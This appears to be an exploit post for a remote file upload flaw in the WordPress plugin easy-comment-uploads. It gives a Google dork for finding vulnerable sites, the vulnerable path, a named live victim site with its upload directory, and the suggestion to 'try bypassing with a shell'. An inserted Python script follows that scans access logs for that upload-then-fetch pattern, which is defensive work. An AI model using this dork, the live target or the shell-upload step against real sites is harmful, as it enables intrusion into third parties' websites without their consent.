Google Dork : inurl:wp-content/plugins/easy-comment-uploads/upload-form.php
Exploit: wp-content/plugins/easy-comment-uploads/upload-form.php
Example: http://www.[target].com/wp-content/plugins/easy-comment-uploads/upload-form.php
Example: http://www.[target].com/[PATH]/wp-content/plugins/easy-comment-uploads/upload-form.php
Live Target: http://flyguys.net/blog/wp-content/plugins/easy-comment-uploads/upload-form.php
Live Target Upload Dir: http://flyguys.net/blog/wp-content/uploads/2014/09/x.jpg
You can upload: html, txt, gif, jpg, bmp and movie formats. Try bypassing with a shell.
After upload, you can access your file at:
Example: http://www.[target].com/wp-content/uploads/[YEAR]/[MONTH]/yourfile.txt
Example: http://www.[target].com/wp-content/uploads/2014/09/x.txt
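
For site owners, the upload-then-fetch sequence described above can be looked for in web server access logs. The following is an added example, not part of the original post or the plugin: it assumes the Apache/nginx combined log format, the function name, extension list and sample log lines are constructed for illustration, and only the two paths are taken from the page.

```python
import re
from collections import defaultdict

# The two paths come from the page; everything else is an assumption.
FORM = "/wp-content/plugins/easy-comment-uploads/upload-form.php"
UPLOAD = re.compile(r"/wp-content/uploads/\d{4}/\d{2}/([^/?\s]+)")
# Non-media extensions worth a look when served from the uploads directory.
SUSPECT = {"html", "htm", "txt", "php", "phtml", "svg", "js"}
# Assumed Apache/nginx combined log format.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def triage(lines):
    """Return {client_ip: [(kind, url), ...]} for clients that POSTed to the
    upload form and afterwards fetched a non-media file from uploads/."""
    posted, findings = set(), defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip malformed lines rather than guess
        ip, method, url, status = m.groups()
        path = url.split("?", 1)[0]
        if method == "POST" and path.endswith(FORM) and status.startswith("2"):
            posted.add(ip)
            findings[ip].append(("upload-form POST", url))
            continue
        hit = UPLOAD.search(path)
        if hit and ip in posted and status == "200":
            # Check every dot-separated part so "x.php.jpg" is also caught.
            if set(hit.group(1).lower().split(".")[1:]) & SUSPECT:
                findings[ip].append(("non-media upload served", url))
    # A POST alone may be an ordinary comment attachment; report only pairs.
    return {ip: f for ip, f in findings.items()
            if any(kind == "non-media upload served" for kind, _ in f)}

SAMPLE = [  # constructed log lines using documentation IP ranges
    '203.0.113.7 - - [12/Sep/2014:10:01:02 +0000] "POST /blog/wp-content/plugins/easy-comment-uploads/upload-form.php HTTP/1.1" 200 512 "-" "curl/7.30"',
    '203.0.113.7 - - [12/Sep/2014:10:01:09 +0000] "GET /blog/wp-content/uploads/2014/09/x.txt HTTP/1.1" 200 14 "-" "curl/7.30"',
    '198.51.100.4 - - [12/Sep/2014:10:05:00 +0000] "POST /blog/wp-content/plugins/easy-comment-uploads/upload-form.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [12/Sep/2014:10:05:03 +0000] "GET /blog/wp-content/uploads/2014/09/cat.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [12/Sep/2014:10:07:00 +0000] "GET /blog/wp-content/uploads/2014/09/notes.html HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, events in triage(SAMPLE).items():
        print(ip, events)
```

Only the client that both posted to the form and then retrieved a non-media file is reported; the image uploader and the visitor who never posted are left out.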
0 Response to "WordPress - Plugin easy-comment-uploads Remote File Upload"